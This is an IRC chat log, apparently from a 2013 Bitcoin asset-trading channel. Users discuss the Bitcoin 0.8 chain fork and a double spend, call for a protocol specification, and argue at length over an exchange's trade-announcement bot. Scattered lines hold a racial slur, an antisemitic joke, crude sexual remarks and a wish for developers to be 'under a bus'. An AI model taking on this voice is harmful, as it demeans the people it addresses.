client code. maybe its just their style. Mar 12 21:26:06 its like: Dbc *pcursor = db.GetCursor(); Mar 12 21:26:07 wtf Mar 12 21:26:18 lol Mar 12 21:26:22 [BTCTC] [BASIC-MINING] 1 @ 0.3449 BTC [-] Mar 12 21:26:25 [BTCTC] [BASIC-MINING] 2 @ 0.345 = 0.69 BTC [+] Mar 12 21:27:17 at least the SSL code they copied looks to be better: BN_CTX *ctx = NULL; Mar 12 21:27:27 cross-posting for mircea_popescu cause he'll love it http://www.reddit.com/r/Bitcoin/comments/1a5um4/bitcointalk_a_successful_double_spend_us10000/?utm_medium=twitter&utm_source=Fancy+Show+Tech Mar 12 21:27:59 bah. Mar 12 21:28:47 ok i gotta walk away for a bit and think about this some more. Mar 12 21:29:07 i still <3 you guys tho :) Mar 12 21:30:13 :) Mar 12 21:49:13 mircea_popescu: what do you mean by arbitrarily-sized transactions? Mar 12 21:49:20 actual kb on disk? Mar 12 21:49:24 or in mem i suppose Mar 12 21:50:52 i want to make a 750kb tx. Mar 12 21:51:14 you know, 5000 inputs, 7000 outputs. my business. Mar 12 21:52:02 [BTCTC] [SYNERGY] 1 @ 0.076 BTC [-] Mar 12 21:52:17 [BTCTC] [SYNERGY] 1 @ 0.076 BTC [-] Mar 12 21:52:23 mhm. Mar 12 21:52:39 but noooooooo Mar 12 21:53:42 mircea_popescu: lol? Mar 12 21:53:57 and pay a huge fee of.. 0.1 btc!! Mar 12 21:54:49 that's my problem. Mar 12 21:54:54 if the block can take it i can make it. Mar 12 21:54:59 nobody gets to say i can't, Mar 12 21:55:10 and more importantly bitcoind doesnt die with "failed to create transaction" Mar 12 21:55:24 this sort of shit belongs in onboard code for vibrating dildoes at the most. Mar 12 21:56:47 what about those of us who have been running 0.9 Mar 12 21:56:49 ? Mar 12 21:57:40 now now. Mar 12 21:57:51 it's a transient state. frustrating to be sure. Mar 12 21:58:19 especially to those of us accustomed to flushing idiots out of systems with economics. Mar 12 21:58:41 heh. Mar 12 21:58:48 you mentioned something about the dev team starting work on a spec? Mar 12 21:58:55 would you point me at that? Mar 12 21:58:55 [BTCTC] [CRYPTO-TRADE] 3 @ 0.2 = 0.6 BTC [+] Mar 12 21:58:58 i mentioned something about how they;'d better Mar 12 21:59:01 or else. Mar 12 21:59:29 https://bitcointalk.org/index.php?topic=152027.msg1617104#msg1617104 latest installment of bitchslapping Mar 12 22:00:18 [BTCTC] [ASICMINER-PT] 1 @ 0.724999 BTC [+] Mar 12 22:00:21 sipa jgarzik: have we seen a block which affected 5000 transaction index entries? Mar 12 22:00:21 jgarzik sipa: I don't think so Mar 12 22:00:24 so much for testing Mar 12 22:00:27 motherfucking... Mar 12 22:02:10 [BTCTC] [COGNITIVE] 1 @ 0.18 BTC [-] Mar 12 22:03:10 The Church of Bitcoin and the Vatican Bitcoin Foundation have met Luther Popescu Mar 12 22:05:09 so can we rewind the tape just a bit... Mar 12 22:05:20 didn't this happen or something very similar to it before? Mar 12 22:05:50 like on upgrade from version 4 to 5 or something? there was a night where they did an upgrade and the similar thing happened. Mar 12 22:06:09 [BTCTC] [S.DICE-PT] 87 @ 0.00559 = 0.4863 BTC [+] Mar 12 22:07:00 i gotta look through btctalk for that *sigh* Mar 12 22:09:12 awe fuck it, i guess that's long ago anyway. Mar 12 22:09:15 i hate that site Mar 12 22:11:17 mircea_popescu one thing i don't understand, you aren't going to hire any devs yourself cause it isn't worth the conflict and drama? Mar 12 22:11:32 what do you plan to do, then? Mar 12 22:11:42 jurov atm the plan ios to push for spec Mar 12 22:11:49 it shouldn't be up to one dude to pay for all this shit... Mar 12 22:11:55 and ideally remove the current devteam's license to release new clients. Mar 12 22:11:58 past this point. Mar 12 22:12:17 and who will do the spec? have any allies to do it together? Mar 12 22:12:19 then once we have spec they can fix their fucked codebase and release a proper client Mar 12 22:12:25 jurov : perhaps. one sec Mar 12 22:13:02 https://bitcointalk.org/index.php?topic=152027.msg1614847#msg1614847 Mar 12 22:13:15 i just feel like, this should be like a HACK THE PLANET type thing, and people who want this to work will make it work. Mar 12 22:14:01 im not sure what planet these guys are on, but if this is their baby and they have commitbits to the most widely used full-node base, they aught to make sure it functions correctly. Mar 12 22:14:28 anyway, drives me up a wall, I'll tell you. :) Mar 12 22:14:48 heh. Mar 12 22:17:02 [HAVELOCK] [SDICE] 2 @ 0.574 = 1.148 BTC [-] Mar 12 22:18:25 jurov anyway, the problem isn't as much the drama, but moreover that a single-source codebase is both non-bitcoiny and suspect. Mar 12 22:18:40 but i think if we can get one (or ideally multiple) people to summarize the code Mar 12 22:18:45 we can pretty much derive a spec from there. Mar 12 22:19:09 this wouldn't take much longer than a few weeks for a first draft, which can then be argued and refined Mar 12 22:19:41 in my experience any devteam resists such an effort like cats resist washing, because coders love to write but hate having to read code. Mar 12 22:20:00 hiowever, once it's complete there's a few day's worth of facepalming and going "wait, we are doing W?HAT ?!" Mar 12 22:20:02 [HAVELOCK] [SDICE] 1 @ 0.57577575 BTC [+] Mar 12 22:20:05 after which everything's much better. Mar 12 22:20:59 this is a solid plan. Mar 12 22:21:02 [HAVELOCK] [SDICE] 1 @ 0.57999999 BTC [+] Mar 12 22:21:35 mod6 in experience it tends to work. Mar 12 22:21:52 of course it has to first get the cat into the washing machine. Mar 12 22:22:02 [HAVELOCK] [SDICE] 6 @ 0.58 = 3.48 BTC [+] Mar 12 22:22:07 :} Mar 12 22:22:32 well, i'd love to and have no problems to read others code.. just that i'm neck deep elsewhere atm. Mar 12 22:22:40 i understand Mar 12 22:23:20 why it's called open source after all, sits there and waits for when / who has time for it Mar 12 22:23:56 oh, that happens with all opensource without paid devs Mar 12 22:24:31 here are the problems that i don't know how to solve. Mar 12 22:24:48 a. i hire someone. well... this opens the political problem of "oh, he's mp's puppet". Mar 12 22:25:14 b. i set up a prize which anyone may claim. well... this opens the idiocy problem of "oh, I don'tneed his money, what does me take for, a starving artist????" Mar 12 22:25:21 right. no, this needs to be something that is adopted by the users of the system. Mar 12 22:25:36 + "it's not enough" drama + trying to get the pruize with as little work as possible etc Mar 12 22:25:50 i'm kinda stuck to just talking atm because a and b. Mar 12 22:25:54 just hire someone. this muppet argument will ensue but code/doc will remain in the end Mar 12 22:26:07 perhaps. Mar 12 22:26:09 i remember something like with linux and redhat Mar 12 22:26:13 it's in any case not something i have to call today. Mar 12 22:26:17 jurov certainly. Mar 12 22:27:23 maybe i'll hire amir taaki.. he'll do gladly for food and shelter Mar 12 22:27:24 well, i think this bitcoin project is again an "ALL YOUR BASE ARE BELONG TO US." type of thing. Mar 12 22:27:50 mod6 what outer space metaphors are you onto again.... Mar 12 22:28:00 the best kind Mar 12 22:28:41 so this fucking agent calls me in yesterday to show the same offer as last week, only on paper Mar 12 22:28:43 jurov i bet you i can tell you have just by reading his output Mar 12 22:28:57 because numbers look different than they sound obviously Mar 12 22:29:48 ban them. Mar 12 22:31:26 what are you taking offers on, dub? Mar 12 22:31:32 russian bride Mar 12 22:32:10 lol the vride isn't up to specs Mar 12 22:32:13 *bride Mar 12 22:32:25 benkay: houses Mar 12 22:32:50 jurov she's a little worn i nplaces. Mar 12 22:32:54 and there's a crack Mar 12 22:33:00 So, what I'm saying is, I think it's a really good thing to create a spec, and then everyone can punch eachother in the nuts over it until its perfect. This is the way to go. Mar 12 22:33:01 more like a gash really. Mar 12 22:33:09 mod6 werd. Mar 12 22:33:46 there will eventually be an incentive for the miners to disregard devsquad Mar 12 22:33:57 in retrospect, i'm a little surprised they didn't this time Mar 12 22:34:04 I think, at least for myself, every time I had to write a paper, or have written some code; I've gone back the next day or at some later date and done a `wtf?' Mar 12 22:34:14 benkay exactly. Mar 12 22:34:17 ^^ erryday. Mar 12 22:34:33 even the other night, i wrote that code quick that worked. i mean, it kinda worked, in the way that it fucked a donkey. Mar 12 22:34:37 the btcguild people got fucked for ~2k btc because of it. Mar 12 22:34:45 this keeps up, soon enough idiots will not have the dough to keep going Mar 12 22:34:49 much like btc finance was cleanned up. Mar 12 22:34:54 but then you know, you review, you think about it, you make changes and it gets better. Mar 12 22:35:02 it's a painful process Mar 12 22:35:05 good. Mar 12 22:35:28 dunno if i agree about that. Mar 12 22:35:30 mod6 yea but if you don't painstakingly document it it just won't go past some threshold Mar 12 22:35:39 i don't optimize for pain. Mar 12 22:35:42 rather the opposite. Mar 12 22:35:42 i do. Mar 12 22:35:46 heh. Mar 12 22:35:47 it delivers superb results. Mar 12 22:35:54 the more people are hurt, the better stuff comes out. Mar 12 22:35:57 i beat dead horses Mar 12 22:36:00 where'd the 2k btc figure come from? Mar 12 22:36:05 i've said that before. but usually my code works too. Mar 12 22:36:08 ;] Mar 12 22:36:17 yes bitcoind usually works, too Mar 12 22:36:18 Lyspooner they lost ~1.2k because the new .8 redownloaded the chain and they autopaid miners submitting as if low diff Mar 12 22:36:22 haha Mar 12 22:36:23 i optimize for pleasure within my in-group, and i let the rest of the world experience their own mistakes. Mar 12 22:36:25 they lost a further however much cause of discarded blocks Mar 12 22:37:12 mircea_popescu were they auto-paying miners with coins older than 120 blocks since mined? Mar 12 22:37:34 yes, the op was quite clear about having lost the 1.2k Mar 12 22:37:47 isn't that the op's fault then? Mar 12 22:37:59 cause they did what tho ? upgraded ? Mar 12 22:38:06 sure, it's their fault. Mar 12 22:38:11 anything faster than 120 blocks is the ops fault Mar 12 22:38:17 because why ? Mar 12 22:38:41 they are paying miners with fresher coins than is safe Mar 12 22:38:49 i don't think you understand the problem. Mar 12 22:39:05 as the blockchain was being downloaded, the difficulty was corresponding to very old blocks, ie, very low. Mar 12 22:39:05 Lyspooner pools attract noobs on fast payouts, is that surprising for you? Mar 12 22:39:17 as miners submitted current work, they were paid for their share of contribution to that low difficulty Mar 12 22:39:19 ie, very much. Mar 12 22:40:28 maybe i misunderstand mining pools' payouts. but if i do work now, i shouldn't be paid until t+120 Mar 12 22:40:51 yea well it's not how it works out in practice. Mar 12 22:41:06 and speaking of that 120... YET MORE MAGIC NUMBERS FUCKING HELL Mar 12 22:41:08 but that's the risk that mining pool ops assume Mar 12 22:41:16 kakobrekla you didn't got doublespended on smpake.com? Mar 12 22:41:31 Lyspooner not detachedly from the general "trusting devteam" risk Mar 12 22:41:37 smpake is not operating since jan Mar 12 22:41:38 ah smpake is down Mar 12 22:43:53 (13:35) < jurov> mod6 yea but if you don't painstakingly document it it just won't go past some threshold << documentation is amazing Mar 12 22:44:19 i've read tons of technical manuals. i quite like the strangely. Mar 12 22:44:23 *them Mar 12 22:44:52 but... it doesn't have to be 50 volumes to be helpful either. Mar 12 22:45:00 cause the source speaks volumes itself Mar 12 22:45:36 but there can always be a little guidence on how it is designed, why something is implemented the way it is, etc. Mar 12 22:46:13 i feel like we need a bitcoin RFC Mar 12 22:46:56 !ticker Mar 12 22:46:57 Quest for vision is a great blessing. Mar 12 22:47:04 hmm, assbot is there Mar 12 22:47:20 sup mah niggah Mar 12 22:47:46 assbot thinks its people Mar 12 22:47:53 ;;ticker Mar 12 22:47:53 BTCUSD ticker | Best bid: 45.97092, Best ask: 46.00000, Bid-ask spread: 0.02908, Last trade: 46.00000, 24 hour volume: 179859.80684158, 24 hour low: 36.65000, 24 hour high: 48.39999, 24 hour vwap: 43.75220 Mar 12 22:48:26 lol Mar 12 22:49:48 market doesn't seem terribly concerned about about all this Mar 12 22:50:03 at least for now Mar 12 22:50:40 and seeing evoorhees, "blockchain forks. satoshi dice not affected" i guess Mar 12 22:51:21 SatoshiDice bet sizes not being affected by the exchange rate is a nice surprise Mar 12 22:52:13 github down ? Mar 12 22:52:28 jurov he had processing turned off for a little. Mar 12 22:56:18 that would be funny if satoshidice kept functional on both sides of the fork Mar 12 22:57:23 jurov it would be trivial to implement Mar 12 22:57:38 idiot parade is lucky that evoorhees is a sweetheard, even if they treat him like dirt. Mar 12 23:05:43 (12:08) < mircea_popescu> mod6 actually once you're done with the iphone app, a very good use of someone's time is to go through the codebase and summarize it Mar 12 23:05:46 (12:08) < mircea_popescu> that;s usually a good step towards specification. Mar 12 23:06:01 [BTCTC] [S.DICE-PT] 20 @ 0.00559 = 0.1118 BTC [+] Mar 12 23:06:08 maybe bitotter can wait Mar 12 23:06:35 cause i feel like i want to clone and start going through this thing again. last year, I made a shit load of my own changes to get it working on freebsd properly. Mar 12 23:07:09 anyway, I'll pull to linux and go through the code. Mar 12 23:07:30 i wont start by making any changes to the source, just review it as I can. Mar 12 23:07:51 yall should be doing the same thing. Mar 12 23:09:52 mod6 but listen Mar 12 23:09:57 you gotta finish projects too Mar 12 23:10:09 if you only start them, work for some, then start new one... lot of wasted work man. Mar 12 23:10:37 well, fair enough. Mar 12 23:13:16 [BTCTC] [PAJKA.BOND] 20 @ 0.1 = 2 BTC [+] Mar 12 23:19:26 [BTCTC] [LTC-MINING] 1 @ 0.39 BTC [+] Mar 12 23:21:31 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Mar 12 23:24:14 pigeons https://bitcointalk.org/index.php?topic=152027.msg1617557#msg1617557 Mar 12 23:24:17 for your pleasure. Mar 12 23:25:24 [BTCTC] [BTC-TRADING-PT] 2 @ 0.1987 = 0.3974 BTC [+] Mar 12 23:26:48 what's a spec Mar 12 23:30:18 http://i.imgur.com/NncJ5fI.jpg Mar 12 23:30:28 a specification Mar 12 23:30:58 spec stands to code in the same relationship contract stands to trade. Mar 12 23:31:11 you can have trade without contracts but it's a recipe for disaster. Mar 12 23:31:50 i understand it only metaphorically now Mar 12 23:32:45 that puts you muchly ahead of bitcoin-dev people. Mar 12 23:32:53 they don't understand it at all. Mar 12 23:33:14 sweet Mar 12 23:33:21 i'm going to start a foundation Mar 12 23:33:48 [BTCTC] [BTC-BOND] 24 @ 0.00999 = 0.2398 BTC [+] Mar 12 23:34:52 cool. Mar 12 23:35:21 P T Barnum's Magical Trading Cards & Bitcoin Esoteric Foundation ? Mar 12 23:36:14 I was thinking: The Bitcoin Best Guess Foundation Mar 12 23:36:36 or Whatever Kinda Works Mar 12 23:37:16 or that yeah Mar 12 23:57:56 [BTCTC] [PAJKA.BOND] 5 @ 0.1 = 0.5 BTC [+] Mar 13 00:10:52 heres some low hanging fruit for you mircea_popescu. we really should get a SD on testnet Mar 13 00:11:07 what's that to do with me ? Mar 13 00:11:42 you aren't on a quest to rescue bitcoin from mediocraty? Mar 13 00:11:59 i set myself much lower goald. Mar 13 00:12:01 goals* Mar 13 00:12:58 shivving a few poindexters more your speed Mar 13 00:13:25 ;;ticker Mar 13 00:13:25 BTCUSD ticker | Best bid: 44.52000, Best ask: 44.55501, Bid-ask spread: 0.03501, Last trade: 44.55501, 24 hour volume: 182706.33065327, 24 hour low: 36.65000, 24 hour high: 48.39999, 24 hour vwap: 43.75828 Mar 13 00:18:07 mircea_popescu Mar 13 00:18:15 if I put a test bot trade announcer in here Mar 13 00:18:16 that's me. Mar 13 00:18:18 will you be happy? Mar 13 00:18:20 just announcing for now Mar 13 00:18:26 in alpha test mode Mar 13 00:18:26 :P Mar 13 00:18:28 like a diff bot ? sure. Mar 13 00:18:38 but would you stop whining about trades? :P Mar 13 00:19:07 atm im goingthrough the summary of the bitcoin-dev session for the 12th Mar 13 00:19:20 i don't think there's much hope for the current dev team, seriously. Mar 13 00:19:35 switch to litecoin Mar 13 00:19:40 anyone "upgrading" to any further crap they release is irresponsible from a business perspective. Mar 13 00:19:47 we need an actual trustworthy bitcoin implementation asap. Mar 13 00:19:48 i think were better off with btc's team than nothing Mar 13 00:19:57 meh Mar 13 00:19:58 atm bitcoin is forked, in the sense that some kids are in jerkoff lalaland Mar 13 00:20:00 i am not using their crap Mar 13 00:20:03 whereas the protocol is unimplemented. Mar 13 00:20:10 i am using a highly customized version Mar 13 00:20:15 assbot is for assets trades Mar 13 00:20:17 Ukto no, atm we'd be better of if everyone in devteam were under a bus. Mar 13 00:20:19 which is why I wasnt effected Mar 13 00:20:22 we wont have 10 different ones here Mar 13 00:20:35 its really simple to implement, just ask the others. Mar 13 00:20:38 kakobrekla: will you write websocket support? Mar 13 00:20:45 i dont want systems banging on my webservers Mar 13 00:20:51 i just paid someone to write it Mar 13 00:20:54 to make ppl happy Mar 13 00:21:05 since no one else can get with the times Mar 13 00:21:09 and stop using archaic technology Mar 13 00:21:11 ill make websocket when you have 10 trades per second consistently Mar 13 00:21:25 well now you dont have to worry Mar 13 00:21:28 that;'ll be fun to watch in chan lmao Mar 13 00:21:30 i have it running Mar 13 00:21:45 same format for trade display Mar 13 00:21:48 the thing is there is one protocol by which all exchanges go Mar 13 00:21:58 take it or leave it Mar 13 00:22:02 then the other exchanges should move into the present Mar 13 00:23:05 sorry, but I know how to create platforms that dont buckle under load when they get a large userbase Mar 13 00:23:11 do it right the first time Mar 13 00:23:15 or just be a fuckup Mar 13 00:23:27 Ukto: how's a push from your system to assbot 'banging your server'? if i understand it right assbot doesn't pull from your servers Mar 13 00:23:44 enabling the 15sec call requests on the graphs on bf Mar 13 00:23:51 caused a laod increase of 5% on the servers Mar 13 00:23:58 O_o Mar 13 00:23:59 with all the extra unneeded sql queries Mar 13 00:24:01 new mpex webserver coming online imminently. Mar 13 00:24:15 nice! Mar 13 00:24:16 380 requests every other second Mar 13 00:24:21 there will be a trade freeze, should be no more than ~10 minutes, will be announced in advance Mar 13 00:24:36 so you can do 380 but you cant do 382 Mar 13 00:24:43 i dont do them Mar 13 00:24:45 i turned it off Mar 13 00:24:48 w/e Mar 13 00:24:50 about to turn on websockets for the browser Mar 13 00:24:59 good for you Mar 13 00:25:00 will create no extra load Mar 13 00:25:03 and everything will work Mar 13 00:25:09 if you tell me no bot in here Mar 13 00:25:12 thats fine Mar 13 00:25:16 i will put it in #bitfunder Mar 13 00:25:19 and people can watch it there if they want Mar 13 00:25:23 theres assbot. Mar 13 00:25:49 mpex is a special case Mar 13 00:25:56 i was trying to be nice and paid to have something done to make people happy Mar 13 00:26:00 now blockchain.info is getting the DDoS treatment: https://twitter.com/blockchain/status/311591961268215809 Mar 13 00:26:01 i could honestly care less about it announcing in here Mar 13 00:26:02 you are being just silly Mar 13 00:26:05 mircea_popescu: do you have a link to the bitcoin-dev summary you're referring to? Mar 13 00:26:07 good! Mar 13 00:26:09 [BTCTC] [PAJKA.BOND] 2 @ 0.1 = 0.2 BTC [+] Mar 13 00:26:10 then dont do it Mar 13 00:26:13 i think your beig silly by not letting another bot Mar 13 00:26:27 one with no commands Mar 13 00:26:28 [BTCTC] [PAJKA.BOND] 30 @ 0.1 = 3 BTC [+] Mar 13 00:26:28 you dont care but you care enough to bring another bot? Mar 13 00:26:28 at all Mar 13 00:26:37 just to make people happy Mar 13 00:26:38 how does that work Mar 13 00:26:40 otherwise its not my issue Mar 13 00:26:41 aha Mar 13 00:26:45 if the channel operator doesnt want it Mar 13 00:26:52 ppl want to see trades on irc Mar 13 00:26:53 fine Mar 13 00:26:53 read it all here http://bitcoinstats.com/irc/bitcoin-dev/logs/2013/03 Mar 13 00:26:57 they can do itwhever the bot is allowed Mar 13 00:27:11 mircea_popescu: you will need to join #bitfunder if you want to see the trades if he wont allow it Mar 13 00:27:19 otherwise i dont want to hear any more complaints about it Mar 13 00:27:20 the other exchanges had no problem intergrating Mar 13 00:27:20 end of story. Mar 13 00:27:23 it was done in 10 min Mar 13 00:27:32 strange you have one. Mar 13 00:27:39 this is going well Mar 13 00:28:01 TomServo no, as it's not public. but you can have the source http://bitcoinstats.com/irc/bitcoin-dev/logs/2013/03/12 Mar 13 00:28:32 kakobrekla: so you want me to make a custom GET/POST request script Mar 13 00:28:37 specially for your bot to bang every 5 seconds ? Mar 13 00:29:04 if a onliner means 'custom get post script' then yes Mar 13 00:29:15 Ukto i don't think you understand how this works Mar 13 00:29:20 you post to his server not the other way around Mar 13 00:29:32 that would never work then Mar 13 00:29:42 mircea_popescu: Thanks. Mar 13 00:29:56 the server remains behind protection for a reason as not to have the ips given out Mar 13 00:29:59 Ukto how to you publish on twitter ? Mar 13 00:30:11 twitter is not a person on irc Mar 13 00:30:15 and part of the btc community Mar 13 00:30:20 so use a proxy Mar 13 00:30:26 and thts prolly going to stop honestly Mar 13 00:30:30 it has no real use Mar 13 00:30:37 wait. jhow are you going to implement ipless websockets ?! Mar 13 00:30:46 mircea_popescu: i already todl you that Mar 13 00:30:51 the main servers ip Mar 13 00:30:53 is not revealed Mar 13 00:31:03 but if you connect via sockets, you expose an ip Mar 13 00:31:11 not to end users Mar 13 00:31:20 but to the same people you'd be post-ing to Mar 13 00:31:22 only to the socket network Mar 13 00:31:36 oh, that socket network thing Mar 13 00:31:38 yes Mar 13 00:31:54 it removes all load on information distribution Mar 13 00:32:06 I was discussing it with tux as well Mar 13 00:32:20 to lower load on the servers Mar 13 00:33:14 so the conclusion is Ukto cant afford a post per trade Mar 13 00:33:27 anywho, we were at a crossroads, i didnt want to custom for your bot because its really a waste of time when theres a simple method for it. I paid someone to make a work around. you say NO for no real reason. thas that Mar 13 00:33:32 i drop the subect Mar 13 00:33:37 call me a jew Mar 13 00:33:40 i punch those pennies Mar 13 00:33:40 :) Mar 13 00:33:45 when it comes to load Mar 13 00:33:47 and efficiency Mar 13 00:33:59 pinch Mar 13 00:34:00 even Mar 13 00:34:01 just a coder mircea_popescu, just a coder. Mar 13 00:34:58 and fwiw it took someone 10 minutes to make a websocket announcing bot. Mar 13 00:35:19 and it takes 3 min to post it to assbot Mar 13 00:35:29 but that doesnt solve the ip protection issue Mar 13 00:35:33 if this channel had 10,000 users i would care more Mar 13 00:35:37 it has about 25 active Mar 13 00:35:46 30 ppl who lurk at any given time Mar 13 00:35:58 and none of them that respond to trades in here by jumping on an exchange and trading because of it Mar 13 00:36:02 nobody is forcing you so is all good, dont sweat it Mar 13 00:36:26 im not. just tired of people whining that they cant see the bf trades Mar 13 00:36:34 so i made a simple solution Mar 13 00:36:37 well then you are wrong perhaps Mar 13 00:36:38 that causes no conflicts Mar 13 00:36:40 or problems Mar 13 00:36:40 hehe Mar 13 00:36:44 good! Mar 13 00:36:53 other than with you hehe Mar 13 00:36:53 :P Mar 13 00:36:55 lets have a cake or something now Mar 13 00:37:08 i mean honestly, can you give me a good reason why different name cant say the same information? Mar 13 00:37:20 what if I manualyl paste them every time? will i get banned? Mar 13 00:37:26 Ukto, what about tickers? Mar 13 00:37:35 jurov: not yet. just announcing Mar 13 00:37:44 !ticker bf i mean Mar 13 00:37:45 How can I be of assistance, my poor man? Mar 13 00:37:51 jurov: might be #bf only Mar 13 00:37:59 assbot is a standard in #bitcoin-assets , in other rooms there can be 252 bots having buttsex for all i care Mar 13 00:38:14 I dont want to override the "standard" Mar 13 00:38:18 but the sstandard is set in its ways Mar 13 00:38:56 its like nano said. if bitcoincharts stops updating its lists of exchanges, he would allow workaround to add new ones Mar 13 00:39:03 for -market Mar 13 00:39:14 maybe some fan of yours will make a script that will listen to your socket and make posts Mar 13 00:39:17 you never know! Mar 13 00:39:34 heh Mar 13 00:39:38 so if this other person operates the bot and announces in here Mar 13 00:39:39 thats fine? Mar 13 00:39:40 -_- Mar 13 00:39:59 are you stupid? Mar 13 00:40:01 Ukto, can I get api access to BF? Mar 13 00:40:48 burnside: the get/post api for bf is currently only opened to 14 ppl and being reworked based on suggestions. debating forcing it all to websocket at this point. Mar 13 00:41:13 for reasons I stated earlier Mar 13 00:41:17 can I be #15? Mar 13 00:41:42 pm ? Mar 13 00:42:04 lol talk about triple standards. Mar 13 00:44:11 we only do double standards here, its more efficient Mar 13 00:44:17 lol Mar 13 00:44:19 and double blockchain. Mar 13 00:44:39 now sd can do twice the tx Mar 13 00:44:44 with same blck size Mar 13 00:45:00 ukto, this is your problem for not scoping market standards first Mar 13 00:45:14 it's not our problem to conform to your preferred implementation Mar 13 00:46:33 sure :) Mar 13 00:46:36 if you want trades seen by max people, publish in places they'll be seen. Mar 13 00:46:54 and i didnt care if they were seen in here or not Mar 13 00:46:57 a few ppl asked Mar 13 00:46:57 head over to otc Mar 13 00:46:58 over and over Mar 13 00:47:00 so i made something Mar 13 00:47:03 end of story Mar 13 00:47:06 haha Mar 13 00:47:11 missed the whole lean startup movement Mar 13 00:47:14 forgot your user research Mar 13 00:47:15 if its not wanted, then its not wanted Mar 13 00:47:17 nobody wants your socket Mar 13 00:47:29 thts fine Mar 13 00:47:33 exactly :) Mar 13 00:47:34 just 'cause you dumped money into it doesn't give it value. Mar 13 00:47:35 they dont have to have it. :) Mar 13 00:47:45 that's fine. your arrogance will cripple your business. Mar 13 00:47:53 tht makes no sense Mar 13 00:47:57 humility and egoless development will open the doors to users Mar 13 00:47:59 "no one wants your socket" "ok" "your arrogent" ? Mar 13 00:48:01 point benkay. Mar 13 00:48:36 you're going to have to articulate that argument a little more clearly. Mar 13 00:48:54 what argument? Mar 13 00:49:01 Ukto: "no one wants your socket" "ok" "your arrogent" ? Mar 13 00:49:21 oh i get it Mar 13 00:49:24 you say someone doesnt want something, I said ok. and you called me arrogent for it Mar 13 00:49:27 dont understand. :)] Mar 13 00:49:41 i agree, no one has to use the sockets if they dont want to Mar 13 00:49:45 i wont force it on anyone Mar 13 00:49:53 whats the issue? Mar 13 00:50:03 don't have time to explain. Mar 13 00:50:09 no issue for me Mar 13 00:50:14 then pm me another time and we can talk. :) Mar 13 00:50:17 i have none either. Mar 13 00:50:17 :) Mar 13 00:50:34 except for an inherently limited user base watching your data feed :) Mar 13 00:50:39 then one wonders how bitcoin base got in such a mess Mar 13 00:51:15 sad my bet on bitbet "bitfunder won't announce in #bitcoin-assets by ..." wasn't accepted a few days ago ;) Mar 13 00:51:25 rofl Mar 13 00:52:18 sad, why not? Mar 13 00:52:24 FabianB: lol Mar 13 00:52:55 benkay: could've won :) Mar 13 00:53:17 Ukto and kakobrekla just don't get along Mar 13 00:53:23 implying bitbet only takes losing wagers? Mar 13 00:53:53 benkay: no Mar 13 00:54:08 FabianB: nah, kako's fine Mar 13 00:54:12 i have no issue with em Mar 13 00:54:38 i just dont want to use post/get's (which i originalyl thought thats how it worked for the bot since i was never todl otherwise when asked about it) Mar 13 00:54:53 and b. i dont issue outbound connections from any of my servers. weexchange, bitfunder, etc Mar 13 00:55:09 ust a conflict of standards Mar 13 00:55:11 :) Mar 13 00:55:22 yeah Mar 13 00:55:28 i can be trusted with mpex ip Mar 13 00:55:33 which has real ddos threats Mar 13 00:55:33 benkay well no but it doesn't take wagers where one person can singlehandedly decide the outcome Mar 13 00:55:35 but not bitfunder Mar 13 00:55:37 oh noes! Mar 13 00:55:41 oh deep. Mar 13 00:55:41 too easy to game Mar 13 00:55:43 derp Mar 13 00:55:48 Ukto: not really with a proxy (connecting via websockets to bitfunder and posting to assbot) Mar 13 00:56:01 yeah Mar 13 00:56:12 don't trust the good who runs the assbot listening to mpex Mar 13 00:56:17 dood Mar 13 00:56:22 man fuck the spellcheck on this client Mar 13 00:56:22 I guess i could have the guy change the bot Mar 13 00:56:24 i don't have ddos threats lmao Mar 13 00:56:29 to accept websocket announces Mar 13 00:56:33 just throw up the socket already and let someone else spend 3 minutes routing around your damage Mar 13 00:56:35 and then announce a POST to kako's bot Mar 13 00:56:35 :P Mar 13 00:56:38 i have a never ending flood of actuall ddos since like the beginning of the month Mar 13 00:56:49 Ukto: that Mar 13 00:57:28 you can bounce it off the moon while you are at it Mar 13 00:57:31 there are mirros on it Mar 13 00:57:39 mircea_popescu: its just someone sharing their packets with you bro Mar 13 00:57:47 dub they seem to have a lot Mar 13 00:58:23 kakobrekla: pm me the url and format to post the data Mar 13 00:58:54 inb4 "no cause i can't share my ip" Mar 13 00:59:08 :P Mar 13 00:59:12 lol Mar 13 01:00:05 or pm me a url to any documentation Mar 13 01:00:07 whenever you want. Mar 13 01:00:27 aha Mar 13 01:09:00 Fatal error: Call to undefined function gnupg_init() in /home/polimedi/public_html/bitcoin/index.php on line 200 Mar 13 01:09:05 [HAVELOCK] [SDICE] 1 @ 0.57999999 BTC [-] Mar 13 01:09:10 guess where it's from ;) Mar 13 01:09:36 mpex.co... just checked hah Mar 13 01:10:01 [HAVELOCK] [SDICE] 4 @ 0.58 = 2.32 BTC [+] Mar 13 01:11:17 lalala Mar 13 01:11:27 forgot to install someting? ;) Mar 13 01:11:57 php and gnnupg. hated setting that up the first time Mar 13 01:12:00 Ukto as you might notice, mpex.coinbr.com is doing fine Mar 13 01:12:41 why wouldnt it be? Mar 13 01:13:10 now that its on a network that can handle things. jurov was scrambling like crazy to get things setup right Mar 13 01:13:17 i think it worked out great Mar 13 01:13:53 was happy when the live.coinbr graphs started working again. :) Mar 13 01:14:03 im just saying, the proxy is on to mpex. Mar 13 01:14:09 mpex.co is just new gear being deployed/tested etc Mar 13 01:14:17 i guess i should have not dns'd it Mar 13 01:15:33 why not? the beauty of unfinished things lol Mar 13 01:16:11 lol Mar 13 01:31:45 oh that's what's fucking me up Mar 13 01:32:06 today bitcoins dev team is solving the problem of how to ignore people that call them names on the forum Mar 13 01:32:07 mircea_popescu: do errored links count against my weekly tally? :P Mar 13 01:32:09 my guiclient is seeing that mpex.co is there so it's sending STAT's to that Mar 13 01:32:26 smickles mk im fixing this. Mar 13 01:32:28 1 sec Mar 13 01:32:51 meow Mar 13 01:32:56 so what happened Mar 13 01:32:58 we $25 Mar 13 01:32:59 or Mar 13 01:33:05 ;;ticker Mar 13 01:33:05 BTCUSD ticker | Best bid: 44.11000, Best ask: 44.32800, Bid-ask spread: 0.21800, Last trade: 44.32800, 24 hour volume: 184334.05898785, 24 hour low: 36.65000, 24 hour high: 48.39999, 24 hour vwap: 43.73067 Mar 13 01:33:13 there goes my cheap coins Mar 13 01:33:14 lol Mar 13 01:33:48 also http://i.imgur.com/NncJ5fI.jpg Mar 13 01:34:22 lol Mar 13 01:35:24 look at that LTC price rise Mar 13 01:35:25 tsk Mar 13 01:35:46 what db does ltc use? Mar 13 